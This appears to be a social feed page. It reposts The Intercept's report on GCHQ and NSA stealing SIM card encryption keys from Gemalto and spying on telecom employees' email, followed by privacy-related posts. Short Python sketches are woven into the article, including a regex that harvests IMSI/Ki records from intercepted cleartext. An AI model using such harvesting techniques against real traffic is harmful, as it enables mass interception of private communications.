After a SIM card is manufactured, the encryption key, known as a “Ki,” is burned directly onto the chip. A copy of the key is also given to the cellular provider, allowing its network to recognize an individual’s phone. In order for the phone to be able to connect to the wireless carriers’ network, the phone — with the help of the SIM — authenticates itself using the Ki that has been programmed onto the SIM. The phone conducts a secret “handshake” that validates that the Ki on the SIM matches the Ki held by the mobile company. Once that happens, the communications between the phone and the network are encrypted. Even if GCHQ or the NSA were to intercept the phone signals as they are transmitted through the air, the intercepted data would be a garbled mess. Decrypting it can be challenging and time-consuming. Stealing the keys, on the other hand, is beautifully simple, from the intelligence agencies’ point of view, as the pipeline for producing and distributing SIM cards was never designed to thwart mass surveillance efforts.
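The shape of that handshake is ordinary challenge-response: the network sends a random challenge, and both sides independently derive an answer and a session key from the shared Ki. A simplified Python illustration follows, using HMAC-SHA256 as a stand-in for the real GSM algorithms (A3/A8, e.g. COMP128 or MILENAGE); only the principle, not the cryptography, matches the real protocol:

```python
import hashlib
import hmac
import os

KI = os.urandom(16)  # burned onto the SIM; a copy is held by the carrier

def sim_respond(ki: bytes, rand: bytes) -> tuple[bytes, bytes]:
    """Derive the authentication response (SRES) and the session cipher
    key (Kc) from Ki and the network's random challenge. HMAC is a
    stand-in here for the real A3/A8 algorithms."""
    sres = hmac.new(ki, b"A3" + rand, hashlib.sha256).digest()[:4]
    kc = hmac.new(ki, b"A8" + rand, hashlib.sha256).digest()[:8]
    return sres, kc

# Network side: issue a challenge and compute the expected answer.
rand = os.urandom(16)
expected_sres, session_key = sim_respond(KI, rand)

# Phone side: the SIM computes the same values from its copy of Ki.
phone_sres, phone_key = sim_respond(KI, rand)
assert phone_sres == expected_sres  # phone authenticated
assert phone_key == session_key     # both ends now share a cipher key

# The rub: anyone who has stolen KI can run sim_respond too, and so can
# recover Kc for any intercepted session, past or future.
```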

One of the creators of the encryption protocol that is widely used today for securing emails, Adi Shamir, famously asserted: “Cryptography is typically bypassed, not penetrated.” In other words, it is much easier (and sneakier) to open a locked door when you have the key than it is to break down the door using brute force. While the NSA and GCHQ have substantial resources dedicated to breaking encryption, it is not the only way — and certainly not always the most efficient — to get at the data they want. “NSA has more mathematicians on its payroll than any other entity in the U.S.,” says the ACLU’s Soghoian. “But the NSA’s hackers are way busier than its mathematicians.”

GCHQ and the NSA could have taken any number of routes to steal SIM encryption keys and other data. They could have physically broken into a manufacturing plant. They could have broken into a wireless carrier’s office. They could have bribed, blackmailed or coerced an employee of the manufacturer or cell phone provider. But all of that comes with substantial risk of exposure. In the case of Gemalto, hackers working for GCHQ remotely penetrated the company’s computer network in order to steal the keys in bulk as they were en route to the wireless network providers.

SIM card “personalization” companies like Gemalto ship hundreds of thousands of SIM cards at a time to mobile phone operators across the world. International shipping records obtained by The Intercept show that in 2011, Gemalto shipped 450,000 smart cards from its plant in Mexico to Germany’s Deutsche Telekom in just one shipment.

In order for the cards to work and for the phones’ communications to be secure, Gemalto also needs to provide the mobile company with a file containing the encryption keys for each of the new SIM cards. These master key files could be shipped via FedEx, DHL, UPS or another snail mail provider. More commonly, they could be sent via email or through File Transfer Protocol, FTP, a method of sending files over the internet.

The moment the master key set is generated by Gemalto or another personalization company, but before it is sent to the wireless carrier, is the most vulnerable moment for interception. “The value of getting them at the point of manufacture is you can presumably get a lot of keys in one go, since SIM chips get made in big batches,” says Green, the cryptographer. “SIM cards get made for lots of different carriers in one facility.” In Gemalto’s case, GCHQ hit the jackpot, as the company manufactures SIMs for hundreds of wireless network providers, including all of the leading U.S. — and many of the largest European — companies.

But obtaining the encryption keys while Gemalto still held them required finding a way into the company’s internal systems.

[Diagram from a top-secret GCHQ slide.]

TOP-SECRET GCHQ documents reveal that the intelligence agencies accessed the email and Facebook accounts of engineers and other employees of major telecom corporations and SIM card manufacturers in an effort to secretly obtain information that could give them access to millions of encryption keys. They did this by utilizing the NSA’s X-KEYSCORE program, which allowed them access to private emails hosted by the SIM card and mobile companies’ servers, as well as those of major tech corporations, including Yahoo! and Google.

In effect, GCHQ clandestinely cyberstalked Gemalto employees, scouring their emails in an effort to find people who may have had access to the company’s core networks and Ki-generating systems. The intelligence agency’s goal was to find information that would aid in breaching Gemalto’s systems, making it possible to steal large quantities of encryption keys. The agency hoped to intercept the files containing the keys as they were transmitted between Gemalto and its wireless network provider customers.

GCHQ operatives identified key individuals and their positions within Gemalto and then dug into their emails. In one instance, GCHQ zeroed in on a Gemalto employee in Thailand who they observed sending PGP-encrypted files, noting that if GCHQ wanted to expand its Gemalto operations, “he would certainly be a good place to start.” They did not claim to have decrypted the employee’s communications, but noted that the use of PGP could mean the contents were potentially valuable.

The cyberstalking was not limited to Gemalto. GCHQ operatives wrote a script that allowed the agency to mine the private communications of employees of major telecommunications and SIM “personalization” companies for technical terms used in the assigning of secret keys to mobile phone customers. Employees for the SIM card manufacturers and wireless network providers were labeled as “known individuals and operators targeted” in a top-secret GCHQ document.

According to that April 2010 document, “PCS Harvesting at Scale,” hackers working for GCHQ focused on “harvesting” massive amounts of individual encryption keys “in transit between mobile network operators and SIM card personalisation centres” like Gemalto. The spies “developed a methodology for intercepting these keys as they are transferred between various network operators and SIM card providers.” By that time, GCHQ had developed “an automated technique with the aim of increasing the volume of keys that can be harvested.”

The PCS Harvesting document acknowledged that, in searching for information on encryption keys, GCHQ operatives would undoubtedly vacuum up “a large number of unrelated items” from the private communications of targeted employees. “[H]owever an analyst with good knowledge of the operators involved can perform this trawl regularly and spot the transfer of large batches of [keys].”

The document noted that many SIM card manufacturers transferred the encryption keys to wireless network providers “by email or FTP with simple encryption methods that can be broken…or occasionally with no encryption at all.” To get bulk access to encryption keys, all the NSA or GCHQ needed to do was intercept emails or file transfers as they were sent over the internet — something both agencies already do millions of times per day. A footnote in the 2010 document observed that the use of “strong encryption products…is becoming increasingly common” in transferring the keys.
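In other words, bulk harvesting reduces to pattern-matching over traffic that has already been intercepted. A toy sketch of such a “trawl” in Python (the record format here is invented for illustration; real key-batch files vary by vendor):

```python
import re

# Hypothetical cleartext batch file crossing the wire via FTP or email:
# one record per SIM card, "IMSI,Ki" with the Ki as 32 hex characters.
intercepted = """
404685505601234,8A7C3B2E1F0D9C8B7A6F5E4D3C2B1A09
404685505601235,0F1E2D3C4B5A69788796A5B4C3D2E1F0
subject: weekly shipment manifest
"""

KI_RECORD = re.compile(r"^(\d{14,15}),([0-9A-Fa-f]{32})$", re.MULTILINE)

for imsi, ki in KI_RECORD.findall(intercepted):
    print(f"harvested Ki for IMSI {imsi}: {ki}")
# Many matches in a single transfer is exactly the "large batch"
# signature an automated harvester would flag.
```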

In its key harvesting “trial” operations in the first quarter of 2010, GCHQ successfully intercepted keys used by wireless network providers in Iran, Afghanistan, Yemen, India, Serbia, Iceland and Tajikistan. But, the agency noted, its automated key harvesting system failed to produce results against Pakistani networks, denoted as “priority targets” in the document, despite the fact that GCHQ had a store of Kis from two providers in the country, Mobilink and Telenor. “[I]t is possible that these networks now use more secure methods to transfer Kis,” the document concluded.

From December 2009 through March 2010, a month before the Mobile Handset Exploitation Team was formed, GCHQ conducted a number of trials aimed at extracting encryption keys and other personalized data for individual phones. In one two-week period, they accessed the emails of 130 people associated with wireless network providers or SIM card manufacturing and personalization. This operation produced nearly 8,000 keys matched to specific phones in 10 countries. In another two-week period, by mining just 6 email addresses, they produced 85,000 keys. At one point in March 2010, GCHQ intercepted nearly 100,000 keys for mobile phone users in Somalia. By June, they’d compiled 300,000. “Somali providers are not on GCHQ’s list of interest,” the document noted. “[H]owever, this was usefully shared with NSA.”

The GCHQ documents only contain statistics for three months of encryption key theft in 2010. During this period, millions of keys were harvested. The documents stated explicitly that GCHQ had already created a constantly evolving automated process for bulk harvesting of keys. They describe active operations targeting Gemalto’s personalization centers across the globe, as well as other major SIM card manufacturers and the private communications of their employees.

A top-secret NSA document asserted that, as of 2009, the U.S. spy agency already had the capacity to process between 12 and 22 million keys per second for later use against surveillance targets. In the future, the agency predicted, it would be capable of processing more than 50 million per second. The document did not state how many keys were actually processed, just that the NSA had the technology to perform such swift, bulk operations. It is impossible to know how many keys have been stolen by the NSA and GCHQ to date, but, even using conservative math, the numbers are likely staggering.
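For a sense of scale, a quick back-of-the-envelope calculation (mine, not the document’s): even the low end of that stated capacity works out to about a trillion key operations per day.

```python
# Low end of the NSA's stated 2009 processing capacity (a capability
# figure, not a count of keys actually stolen).
keys_per_second = 12_000_000
per_day = keys_per_second * 86_400  # seconds in a day
print(f"{per_day:,} key operations per day")  # 1,036,800,000,000 (~1 trillion)
```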

GCHQ assigned “scores” to more than 150 individual email addresses based on how often the users mentioned certain technical terms, and then intensified the mining of those individuals’ accounts based on priority. The highest scoring email address was that of an employee of Chinese tech giant Huawei, which the U.S. has repeatedly accused of collaborating with Chinese intelligence. In all, GCHQ harvested the emails of employees of hardware companies that manufacture phones, such as Ericsson and Nokia; operators of mobile networks, such as MTN Irancell and Belgacom; SIM card providers, such as Bluefish and Gemalto; and employees of targeted companies who used email providers such as Yahoo! and Google. During the three-month trial, the largest number of email addresses harvested were those belonging to Huawei employees, followed by MTN Irancell. The third largest class of emails harvested in the trial were private Gmail accounts, presumably belonging to employees at targeted companies.

The GCHQ program targeting Gemalto was called DAPINO GAMMA. In 2011, GCHQ launched operation HIGHLAND FLING to mine the email accounts of Gemalto employees in France and Poland. A top-secret document on the operation stated that one of the aims was “getting into French HQ” of Gemalto “to get in to core data repositories.” France, home to one of Gemalto’s global headquarters, is the nerve center of the company’s worldwide operations. Another goal was to intercept private communications of employees in Poland that “could lead to penetration into one or more personalisation centers” — the factories where the encryption keys are burned onto SIM cards.

As part of these operations, GCHQ operatives acquired the usernames and passwords for Facebook accounts of Gemalto targets. An internal top-secret GCHQ wiki on the program from May 2011 indicated that GCHQ was in the process of “targeting” more than a dozen Gemalto facilities across the globe, including in Germany, Mexico, Brazil, Canada, China, India, Italy, Russia, Sweden, Spain, Japan and Singapore.

The document also stated that GCHQ was preparing similar key theft operations against one of Gemalto’s competitors, Germany-based SIM card giant Giesecke and Devrient.

On January 17, 2014, President Barack Obama gave a major address on the NSA spying scandal. “The bottom line is that people around the world, regardless of their nationality, should know that the United States is not spying on ordinary people who don’t threaten our national security and that we take their privacy concerns into account in our policies and procedures,” he said.

The monitoring of the lawful communications of employees of major international corporations shows that such statements by Obama, other U.S. officials and British leaders — that they only intercept and monitor the communications of known or suspected criminals or terrorists — were untrue. “The NSA and GCHQ view the private communications of people who work for these companies as fair game,” says the ACLU’s Soghoian. “These people were specifically hunted and targeted by intelligence agencies, not because they did anything wrong, but because they could be used as a means to an end.”




THERE ARE TWO basic types of electronic or digital surveillance: passive and active. All intelligence agencies engage in extensive passive surveillance, which means they collect bulk data by intercepting communications sent over fiber optic cables, radio waves or wireless devices.

Intelligence agencies place high power antennas, known as “spy nests,” on the top of their countries’ embassies and consulates, which are capable of vacuuming up data sent to or from mobile phones in the surrounding area. The joint NSA/CIA Special Collection Service is the lead entity that installs and mans these nests for the United States. An embassy situated near a parliament or government agency could easily intercept the phone calls and data transfers of the mobile phones used by foreign government officials. The U.S. embassy in Berlin, for instance, is located a stone’s throw from the Bundestag. But if the wireless carriers are using stronger encryption, which is built into modern 3G, 4G and LTE networks, then intercepted calls and other data would be more difficult to crack, particularly in bulk. If the intelligence agency wants to actually listen to or read what is being transmitted, they would need to decrypt the encrypted data.

Active surveillance is another option. This would require government agencies to “jam” a 3G or 4G network, forcing nearby phones onto 2G. Once forced down to the less secure 2G technology, the phone can be tricked into connecting to a fake cell tower operated by an intelligence agency. This method of surveillance, though effective, is risky, as it leaves a digital trace that counter-surveillance experts from foreign governments could detect.

Stealing the Kis solves all of these problems. This way, intelligence agencies can safely engage in passive, bulk surveillance without having to decrypt data and without leaving any trace whatsoever.

“Key theft enables the bulk, low-risk surveillance of encrypted communications,” the ACLU’s Soghoian says. “Agencies can collect all the communications and then look through them later. With the keys, they can decrypt whatever they want, whenever they want. It’s like a time machine, enabling the surveillance of communications that occurred before someone was even a target.”
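
To make the “time machine” concrete, here is a minimal sketch in Python (using the third-party cryptography package) in which one long-lived symmetric key stands in for the Ki. Real GSM networks derive per-call keys from the Ki with their own algorithms; AES-GCM here is only for illustration:

[code]
# A minimal sketch, not GSM's actual cipher suite: a single long-lived
# AES key stands in for the permanent Ki to show the principle.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

long_lived_ki = AESGCM.generate_key(bit_length=128)  # burned into the SIM once
carrier = AESGCM(long_lived_ki)

# Passive interception: the eavesdropper records ciphertexts it cannot yet read.
recordings = []
for msg in [b"call metadata 2013", b"text message 2014", b"call audio 2015"]:
    nonce = os.urandom(12)
    recordings.append((nonce, carrier.encrypt(nonce, msg, None)))

# Years later the key is stolen. Every past recording opens at once.
stolen = AESGCM(long_lived_ki)
for nonce, ct in recordings:
    print(stolen.decrypt(nonce, ct, None))
[/code]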

Neither the NSA nor GCHQ would comment specifically on the key theft operations. In the past, they have argued more broadly that breaking encryption is a necessary part of tracking terrorists and other criminals. “It is longstanding policy that we do not comment on intelligence matters,” a GCHQ official stated in an email, adding that the agency’s work is conducted within a “strict legal and policy framework” that ensures its activities are “authorized, necessary and proportionate,” with proper oversight, which is the standard response the agency has provided for previous stories published by The Intercept. The agency also said, “[T]he UK’s interception regime is entirely compatible with the European Convention on Human Rights.” The NSA declined to offer any comment.

It is unlikely that GCHQ’s pronouncement about the legality of its operations will be universally embraced in Europe. “It is governments massively engaging in illegal activities,” says Sophie in’t Veld, a Dutch member of the European Parliament. “If you are not a government and you are a student doing this, you will end up in jail for 30 years.” Veld, who chaired the European Parliament’s recent inquiry into mass surveillance exposed by Snowden, told The Intercept: “The secret services are just behaving like cowboys. Governments are behaving like cowboys and nobody is holding them to account.”

The Intercept’s Laura Poitras has previously reported that in 2013 Australia’s signals intelligence agency, a close partner of the NSA, stole some 1.8 million encryption keys from an Indonesian wireless carrier.

A few years ago, the FBI reportedly dismantled several transmitters set up by foreign intelligence agencies around the Washington, DC area, which could be used to intercept cell phone communications. Russia, China, Israel and other nations deploy technology similar to the NSA’s around the world. If those governments had the encryption keys for the SIM cards used by major U.S. cell phone companies’ customers, such as the cards manufactured by Gemalto, mass snooping would be simple. “It would mean that with a few antennas placed around Washington DC, the Chinese or Russian governments could sweep up and decrypt the communications of members of Congress, U.S. agency heads, reporters, lobbyists and everyone else involved in the policymaking process and decrypt their telephone conversations,” says Soghoian.

“Put a device in front of the UN, record every bit you see going over the air. Steal some keys, you have all those conversations,” says Green, the Johns Hopkins cryptographer. And it’s not just spy agencies that would benefit from stealing encryption keys. “I can only imagine how much money you could make if you had access to the calls made around Wall Street,” he adds.

Image/photo GCHQ slide.

THE BREACH OF Gemalto’s computer network by GCHQ has far-reaching global implications. The company, which brought in $2.7 billion in revenue in 2013, is a global leader in digital security, producing banking cards, mobile payment systems, two-factor authentication devices used for online security, hardware tokens used for securing buildings and offices, electronic passports and identification cards. It provides chips to Vodafone in Europe and France’s Orange, as well as EE, a joint venture in the U.K. between France Telecom and Deutsche Telekom. Royal KPN, the largest Dutch wireless network provider, also uses Gemalto technology.

In Asia, Gemalto’s chips are used by China Unicom, Japan’s NTT and Taiwan’s Chunghwa Telecom, as well as scores of wireless network providers throughout Africa and the Middle East. The company’s security technology is used by more than 3,000 financial institutions and 80 government organizations. Among its clients are Visa, Mastercard, American Express, JP Morgan Chase and Barclays. It also provides chips for use in luxury cars, including those made by Audi and BMW.

In 2012, Gemalto won a sizable contract, worth $175 million, from the U.S. government to produce the covers for electronic U.S. passports, which contain chips and antennas that can be used to better authenticate travelers. As part of its contract, Gemalto provides the personalization and software for the microchips implanted in the passports. The U.S. represents Gemalto’s single largest market, accounting for some 15 percent of its total business. This raises the question of whether GCHQ, which was able to bypass encryption on mobile networks, has the ability to access private data protected by other Gemalto products created for banks and governments.

As smart phones become smarter, they are increasingly replacing credit cards and cash as a means of paying for goods and services. When Verizon, AT&T and T-Mobile formed an alliance in 2010 to jointly build an electronic pay system to challenge Google Wallet and Apple Pay, they purchased Gemalto’s technology for their program, known as Softcard. (Until July 2014, it went by the unfortunate name of “ISIS Mobile Wallet.”) Whether data relating to that and other Gemalto security products has been compromised by GCHQ and the NSA is unclear. Both intelligence agencies declined to answer any specific questions for this story.

Image/photo Signal, iMessage, WhatsApp, Silent Phone.

PRIVACY ADVOCATES and security experts say it would take billions of dollars, significant political pressure, and several years to fix the fundamental security flaws in the current mobile phone system that NSA, GCHQ and other intelligence agencies regularly exploit.

A current gaping hole in the protection of mobile communications is that cell phones and wireless network providers do not support the use of Perfect Forward Secrecy (PFS), a form of encryption designed to limit the damage caused by theft or disclosure of encryption keys. PFS, which is now built into modern web browsers and used by sites like Google and Twitter, works by generating unique encryption keys for each communication or message, which are then discarded. Rather than using the same encryption key to protect years’ worth of data, as the permanent Kis on SIM cards can, a new key might be generated each minute, hour or day, and then promptly destroyed. Because cell phone communications do not utilize PFS, if an intelligence agency has been “passively” intercepting someone’s communications for a year and later acquires the permanent encryption key, it can go back and decrypt all of those communications. If mobile phone networks were using PFS, that would not be possible — even if the permanent keys were later stolen.
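
To illustrate the contrast, here is a minimal sketch of forward secrecy via ephemeral Diffie-Hellman, in Python with the third-party cryptography package. X25519 and HKDF are illustrative choices for the sketch, not what any particular carrier deploys:

[code]
# A minimal forward-secrecy sketch: each session gets fresh throwaway
# key pairs, so stealing long-lived keys later reveals nothing about
# sessions recorded earlier.
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives import hashes

def new_session_key():
    # Both endpoints generate ephemeral key pairs for this session only.
    alice = X25519PrivateKey.generate()
    bob = X25519PrivateKey.generate()
    shared = alice.exchange(bob.public_key())
    # Derive the traffic key, after which the ephemeral keys are discarded.
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                info=b"session traffic key").derive(shared)

# Every call or message gets its own key; none of them is the permanent Ki.
print(new_session_key().hex())
print(new_session_key().hex())  # different every time
[/code]

Because the ephemeral private keys are thrown away after each exchange, a later theft of any long-lived key cannot reconstruct the session keys, which is exactly the property the permanent Ki lacks.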

The only effective way for individuals to protect themselves from Ki theft-enabled surveillance is to use secure communications software, rather than relying on SIM card-based security. Secure software includes email and other apps that use Transport Layer Security (TLS), the mechanism underlying the secure HTTPS web protocol. The email clients included with Android phones and iPhones support TLS, as do large email providers like Yahoo! and Google.
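
As a concrete example of that TLS support, a minimal sketch using Python's standard smtplib; the hostname, addresses and credentials are placeholders:

[code]
# A minimal sketch: upgrading an SMTP connection to TLS so the message
# travels encrypted to the provider. Hostname and addresses are placeholders.
import smtplib
import ssl

context = ssl.create_default_context()  # verifies the server's certificate

with smtplib.SMTP("smtp.example.com", 587) as server:
    server.starttls(context=context)  # refuse to continue in plaintext
    server.login("user@example.com", "app-password")  # placeholder credentials
    server.sendmail("user@example.com", "friend@example.com",
                    "Subject: hello\r\n\r\nCarried over TLS, not SIM crypto.")
[/code]

Note that TLS of this kind protects the message on its way to the provider; unlike end-to-end encryption, the provider itself can still read it, which is why governments can fall back to obtaining internal data from the provider.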

Apps like TextSecure and Silent Text are secure alternatives to SMS messages, while Signal, RedPhone and Silent Phone encrypt voice communications. Governments still may be able to intercept communications, but reading or listening to them would require hacking a specific handset, obtaining internal data from an email provider, or installing a bug in a room to record the conversations.

“We need to stop assuming that the phone companies will provide us with a secure method of making calls or exchanging text messages,” says Soghoian.

———


Additional reporting by Andrew Fishman and Ryan Gallagher. Sheelagh McNeill, Morgan Marquis-Boire, Alleen Brown, Margot Williams, Ryan Devereaux and Andrea Jones contributed to this story.

The post How Spies Stole the Keys to the Encryption Castle appeared first on The Intercept.


#Snowden #Encryption #Privacy #Spies #Spying #NSA #GCHQ #Snooping #Surveillance #Communications #Security @LibertyPod+ @Gadget Guru+

Seth Martin
  last edited: Mon, 13 Oct 2014 13:14:18 -0500  
Why privacy matters

Image/photo



Glenn Greenwald was one of the first reporters to see -- and write about -- the Edward Snowden files, with their revelations about the United States' extensive surveillance of private citizens. In this searing talk, Greenwald makes the case for why you need to care about privacy, even if you’re “not doing anything you need to hide."


#Greenwald #Snowden #Privacy #NSA #Surveillance #Spying #Freedom #Security @LibertyPod+
Seth Martin
  last edited: Sun, 25 May 2014 11:54:50 -0500  
Yet another reason to completely switch to open-source, decentralized and distributed communications and content management methods such as the red#, Friendica and XMPP/Jabber.

#^FBI: We need wiretap-ready Web sites - now - CNET

Image/photo

CNET learns the FBI is quietly pushing its plan to force surveillance backdoors on social networks, VoIP, and Web e-mail providers, and that the bureau is asking Internet companies not to oppose a law making those backdoors mandatory.


#CALEA #Wiretapping #Social Networking #Communications #Privacy #FCC #FBI #Surveillance #Security #Backdoors #Snooping #RedMatrix #Friendica #XMPP @LibertyPod+

Seth Martin
  last edited: Sat, 03 May 2014 17:28:17 -0500  
It appears the status quo may finally be making its moves to get control over the heretofore free and open internet.

There's already an open-source, decentralized, single sign-on solution via the Zot protocol in use by the r# today.

The White House Wants to Issue You an Online ID

Image/photo

A few years back, the White House had a brilliant idea: Why not create a single, secure online ID that Americans could use to verify their identity across multiple websites, starting with local government services. The New York Times described it at the time as a "driver's license for the internet."

#Single Sign-On #Internet #Security #Privacy #Passwords #Authentication #Zot #RedMatrix #Online ID #Internet ID @LibertyPod+
Mike Macgirvin
  
Netscape Introduces Netscape Navigator 2.0

To use secure email and other client authentication capabilities, Netscape Navigator 2.0 users will be able to obtain digital certificates from Netscape partners such as VeriSign, Inc. Digital certificates serve as a user's secure "Internet driver's license", identifying the user through public key encryption technology for secure mail and other applications. For users who desire a listing, Netscape will maintain a directory of email names and public keys so that other users can send secure mail to them.
Mike Macgirvin
  
The thing that most people instinctively "get" is that he who owns identity on the internet owns the internet. That's why I feel it's so important to have identity on the internet which is decentralised and cannot be owned. But most people haven't thought that far ahead. Centralised identity will solve a lot of problems, and the forces of complete control of everything will eventually get it. That is, unless we show that our decentralised solution is viable and fixes everything that will go wrong with centralised identity - before it even gets off the ground.

What we don't have is people who understand what control of identity is all about and are willing to fight for freedom. They're too busy complaining about shit that doesn't matter in the bigger picture - like whether or not they've got a link that does 'x', or their link that does 'y' is off by a few pixels from where it should be.

The EFF has had a few days and haven't responded to my calls for how to work together on DoNotTrack, given that we need third-party cookies for the Matrix and decentralised identity to survive and they are opposed to third-party cookies.

So we're probably doomed.
zottel
  last edited: Mon, 05 May 2014 07:37:40 -0500  
Such a thing has already been available since 2010 in Germany. Current ID cards sport an RFID chip, and with a reader you can connect to the PC, you can identify yourself: to some app on the computer, on the internet, at an airport terminal, to the police, etc.

It's theoretically done rather smartly, i.e. there's always a PIN required before data can be read (except if the authorities read it, of course), and any app that wants to read certain fields has to present a certificate that entitles it to, which is provided by the state.

There is also a "pseudonym" function which tells some ID to the company that reads it and thus allows identifying a recurring customer. As every company is served a different ID, it cannot be used to track users outside a single business. (Only theoretically, of course, because they'd just have to outsource that to a third party that is used by many businesses, but still.) For age verification, companies can ask the chip if the owner is over 18, e.g., without the owner having to reveal his actual birth date. Or they can ask if a location where someone lives that was given is correct, without having the possibility to read the data itself.

It's also designed in a way (or at least said to be so) that without entering a PIN, the RFID chip, even if it gets near enough to a reader to be contacted, will never spit out anything that can be tracked, i.e. an always-same serial number or something else that could be used by shop owners to track their customers.

If you upload a certificate to the chip that you could (theoretically) buy from a cert provider, you can use the ID card to digitally sign documents.

There is also biometric data on the chip that can only be read by the authorities with the corresponding certs, consisting of (or only including?) fingerprint scans, which have been made optional for the ID cards, though (different from the passports).

This electronic ID card was introduced with a lot of publicity, depicted as the revolutionary new form of identity proof that everyone would use in the internet from now on. A few thousand RFID readers were even given out for free, though these were the insecure ones without a pinpad (yay!).

The actual outcome was that most people didn't want or need something like that. During a grace period, nearly everyone tried to get the old kind of ID card without RFID chip instead of the new one. Now you don't have a choice anymore; when my ID card runs out next January, I'll have to get the RFID one. Which is much more expensive than the old one, of course.

To my knowledge, there is no company that would offer digital signature services with the ID card. No internet services that use it, either.

I think you can use it when you digitally send your tax declaration, but I'm not sure even about that.

A lot of expensive technology that goes mostly unused.

Seth Martin
  last edited: Sun, 08 Jun 2014 13:47:02 -0500  
NSA Said to Exploit Heartbleed Bug for Intelligence for Years

The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.


#NSA #Spying #Privacy #Surveillance #Heartbleed #Bug #SSL #OpenSSL #Security @LibertyPod+

Seth Martin
  last edited: Mon, 31 Mar 2014 13:15:51 -0500  
The U.S. National Security Agency managed to have security firm RSA adopt not just one, but two security tools, further facilitating NSA eavesdropping on Internet communications. The newly discovered software is dubbed 'Extended Random', and is intended to facilitate the use of the back door in the already known 'Dual Elliptic Curve' random number generator. Researchers from several U.S. universities discovered Extended Random and assert it could help crack Dual Elliptic Curve-encrypted communications 'tens of thousands of times faster'.
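
Dual Elliptic Curve's actual back door involves a secret relationship between curve points, but the failure mode it creates can be illustrated with a toy generator whose output reveals its internal state; 'Extended Random' mattered because it exposed more generator output per connection. The sketch below is an analogy only, not Dual EC itself:

[code]
# Toy analogy for a state-revealing PRNG: if an observer can recover the
# generator's internal state from its output, every future "random" value
# is predictable. Dual EC leaks state to whoever knows a secret relation
# between its curve points; here the leak is direct for clarity.
class LeakyPRNG:
    def __init__(self, seed):
        self.state = seed

    def next(self):
        self.state = (1103515245 * self.state + 12345) % 2**31
        return self.state  # flaw: the output IS the full internal state

victim = LeakyPRNG(seed=123456789)
observed = victim.next()             # one value seen on the wire

attacker = LeakyPRNG(seed=observed)  # clone the generator from the leak
assert [victim.next() for _ in range(5)] == [attacker.next() for _ in range(5)]
print("attacker predicts every subsequent output")
[/code]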

Exclusive: NSA infiltrated RSA security more deeply than thought - study

Image/photo

SAN FRANCISCO (Reuters) - Security industry pioneer RSA adopted not just one but two encryption tools developed by the U.S. National Security Agency, greatly increasing the spy agency's ability to eavesdrop on some Internet communications, according to a team of academic researchers.


#NSA #Spying #Snooping #Liberty #Infiltration #Privacy #RSA #Encryption #Security #Surveillance #Computer Security @LibertyPod
Mike Macgirvin
  
The general consensus was that dual elliptic curve was dead the second the first revelations came out.

Seth Martin
  
Exclusive: Secret contract tied NSA and security industry pioneer

Image/photo

SAN FRANCISCO (Reuters) - As a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry, Reuters has learned.


#RSA #Bsafe #Backdoor #Encryption #NSA #Spying #Snooping #Snowden #Computer Security #Privacy #Freedom #Liberty #Security @LibertyPod

Seth Martin
  
We've seen it argued that privacy is a bad thing. People like former DHS official Stewart Baker have argued that the privacy-protecting efforts of civil liberties activists are the reason we're forced to be fondled and de-shod at TSA checkpoints. Not only that, he's tried to blame the 9/11 attacks on "rise of civil libertarianism." Unbelievably, we've also had a politician recently claim that your privacy isn't violated if you don't notice the violation.

We've also seen attacks on anonymity by (anonymous) police officers and a whole slew of pundits and politicians who believe the only thing online anonymity does is provide a shield for trolls, bullies and pirates to hide behind. Efforts have been made to outlaw online anonymity, but fortunately, very few laws have been passed.

Now, try wrapping your mind around this argument being made by Art Coviello, executive chairman of RSA Security and the head of EMC's security division. According to him, anonymity and privacy are at odds with each other.

A dogmatic allegiance to anonymity is threatening privacy, according to Art Coviello, executive chairman of RSA.

Coviello cast anonymity as the "enemy of privacy" because it gives "free reign to our networks to adversaries" with "no risk of discovery or prosecution."


On one hand, anonymity is slowing down the pursuit of online criminals. On the other hand, companies are increasingly wary of subjecting their employees to intrusive security software.

Customers are caught in a Catch-22. They're afraid to deploy technology for fear of violating workers' privacy, even though security intelligence tools are ultimately the best way to protect personal information, Coviello argued.


How Coviello arrives at the conclusion that anonymity is damaging privacy isn't exactly clear. It may be the enemy of security (or at least, unhelpful to retributive actions), but the online anonymity shielding crooks doesn't threaten users' privacy, at least not directly. Indirectly it could, but it wouldn't be anonymity's "fault." If Coviello wants attackers stripped of anonymity, there's little doubt he'd like to see clients' employees stripped of their privacy. Both would make his companies' jobs easier. Attackers would be easily identified and clients would receive (arguably) better protection (thanks to more, non-anonymized data gathering). Win-win for security. Not so much for those who cherish privacy and anonymity.

This isn't exactly new ground for Coviello. He did some complaining about privacy at last year's RSA conference as well.

RSA executive chairman Art Coviello has criticised privacy advocates for basing their arguments on “dangerous reasoning”, comments that have already earned him a tongue lashing from Big Brother Watch and the Open Rights Group.

Coviello, whilst noting the need for privacy, lambasted privacy groups' "knee jerk" reactions to public and private sector attempts to improve people's security, pointing to the "insanity" of the situation, in a keynote to open the RSA 2012 conference in London this morning.

In Coviello's view, privacy advocates are over-reacting to measures designed to protect online identities, preferring to live in a world of danger: "Because privacy advocates don't realise that safeguards can be implemented, they think we must expect reasonable danger to protect our freedoms," Coviello said.

“But this is based on dangerous reasoning, a knee jerk reaction, without understanding the severity and scope of the problem.

“Where is it written that cyber criminals can steal our identities but any industry action to protect us invites cries of Big Brother.”


Not for nothing has someone noted that RSA is only a letter away from the United States' most notorious intelligence agency.

Coviello's arguments here aren't that much different than the government's opinions on the "liberty vs. security" balance. And like other defenders of intrusive programs, Coviello refers to the statements of critics as an "over-reaction." But is it? He bristles at being compared to Big Brother but his thought processes roughly align with the government's foremost proponents of intrusive programs. According to both, people just don't understand how bad things actually are, and in our unenlightened state, we're making the wrong choice between security and liberty.

Additionally, the "knee jerk reaction" he sees in privacy activists is, in reality, no different than the knee jerk reactions he fails to see in security and intelligence entities. While privacy activists are focused on retaining what's remaining and make small pushes for more, security/intelligence agencies leverage every tragedy or attack to expand their scope and dial back privacy protections.

But where his argument against privacy (and anonymity) ultimately falls apart is in his belief that collecting and storing large amounts of private data is the best solution for all involved.

